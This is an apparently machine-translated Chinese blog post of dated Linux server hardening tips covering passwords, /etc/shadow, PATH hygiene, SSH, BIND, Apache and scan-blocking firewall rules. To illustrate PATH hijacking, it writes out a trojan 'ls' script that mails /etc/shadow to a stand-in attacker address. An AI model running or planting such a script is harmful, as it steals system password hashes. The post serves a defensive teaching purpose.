Linux（服务器）的安全提示（第1部分）

我很久没有在博客上发布任何内容了，我想与您分享一些（其中包括）一本书中的一些建议。 我在大学里找到了它，我只是阅读，虽然说实在有些过时，并且随着系统的发展，所显示的技术不太可能起作用，但它们仍然是有趣的方面。

我想澄清一下，它们是针对中等或大规模用作服务器的Linux系统的建议，因为在桌面用户级别，尽管可以应用它们，但它们并不是很有用。

我还注意到，它们只是简单的快速提示，尽管我计划针对特定主题撰写另一篇更具体，更广泛的文章，但我不会赘述。 但我稍后会看到。 让我们开始吧。

密码政策。 

尽管这听起来像是一个流行语，但拥有良好的密码策略可以区分是否存在易受攻击的系统。 诸如“蛮力”之类的攻击利用了密码错误的优势来访问系统。 最常见的技巧是：

• 组合大写和小写。
• 使用特殊字符。
• 数字。
• 超过6位数字（希望超过8位）。

除此之外，让我们考虑两个基本文件。  / etc / passwd和/ etc / shadow。

非常重要的是该文件 / etc / passwd。 除了给我们用户的名字，他的uid，文件夹路径，bash ..等在某些情况下，它还会显示用户的加密密钥。

 让我们看一下它的典型组成。

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

用户：cryptkey：uid：gid：path :: path：bash

真正的问题是，此特定文件具有权限 -rw-r – r– 这意味着它具有系统上任何用户的读取权限。 而且拥有加密密钥并不是很难解密真正的密钥。

这就是文件存在的原因 / etc /阴影。 除其他事项外，这是存储所有用户密钥的文件。 该文件具有必要的权限，因此没有用户可以读取它。

要解决此问题，我们必须转到文件 / etc / passwd文件 并将加密的密钥更改为“ x”，这只会将密钥保存在我们的文件中 / etc /阴影。

desdelinux:x:500:501::/home/usuario1:/bin/bash

PATH和.bashrc等问题。

当用户在其控制台上执行命令时，外壳程序会在PATH环境变量包含的目录列表中查找该命令。

如果您在控制台中键入“ echo $ PATH”，它将输出如下内容。

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

这些文件夹中的每一个都是外壳将在其中查找为执行该命令而编写的命令的位置。 他“。” 这意味着要搜索的第一个文件夹与执行命令的文件夹相同。

假设有一个用户“ Carlos”，并且该用户想要“做恶”。 该用户可以在其主文件夹中保留一个名为“ ls”的文件，并在该文件中执行以下命令：

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

并且如果目标用户是root用户，则尝试列出carlos文件夹内的文件夹（因为它首先在同一文件夹中查找命令，因此会无意中将带有密码的文件发送到此电子邮件，然后列出该文件夹他直到很晚才发现。

为了避免这种情况，我们必须消除“。” PATH变量。

同样，应该审核/.bashrc、/.bashrc_profile、./.login之类的文件，并检查是否没有“。”。 实际上，您可以在PATH变量中添加类似这样的文件，然后更改特定命令的目标。

服务提示：

SHH

• 在sshd_config文件中禁用ssh协议的版本1。
• 不允许root用户通过ssh登录。
• ssh_host_key，ssh_host_dsa_key和ssh_host_rsa_key的文件和文件夹只能由root用户读取。

BIND

• 更改named.conf文件中的欢迎消息，使其不显示版本号
• 限制区域传输，仅对需要它的团队启用。

阿帕奇

• 阻止服务在欢迎消息中显示您的版本。 编辑httpd.conf文件并添加或修改以下行：  

ServerSignature Off
ServerTokens Prod

• 禁用自动索引
• 将apache配置为不提供敏感文件，例如.htacces，* .inc，* .jsp等。
• 从服务中删除手册页或样本
• 在受限环境中运行apache

网络安全。

必须涵盖从外部网络到系统的所有可能条目，这是一些重要提示，可防止入侵者从您的网络扫描并获取信息。

阻止ICMP流量

必须将防火墙配置为阻止所有类型的传入和传出ICMP流量和回显响应。 这样就可以避免，例如，在IP范围内寻找带电设备的扫描仪将找到您。 

避免TCP ping扫描。

扫描系统的一种方法是TCP ping扫描。 假设您的服务器上的端口80上有一个Apache服务器。入侵者可以向该端口发送ACK请求，如果系统响应，则该计算机将处于活动状态，并将扫描其余端口。

为此，您的防火墙应始终具有“状态感知”选项，并应丢弃所有与已建立的TCP连接或会话不对应的ACK数据包。

一些其他提示：

• 使用IDS系统来检测网络的端口扫描。
• 配置防火墙，使其不信任连接源端口设置。

这是因为某些扫描使用“伪”源端口（例如20或53），因为许多系统信任这些端口，因为它们是ftp或DNS的典型代表。

注意： 请记住，本文中指出的大多数问题已在几乎所有当前发行版中得到解决。 但是，掌握有关这些问题的关键信息永远不会有任何伤害，这样您就不会发生这些问题。

注意： 稍后，我将看到一个特定的主题，并且我将在帖子中提供更详细的最新信息。

感谢所有人阅读。

问候。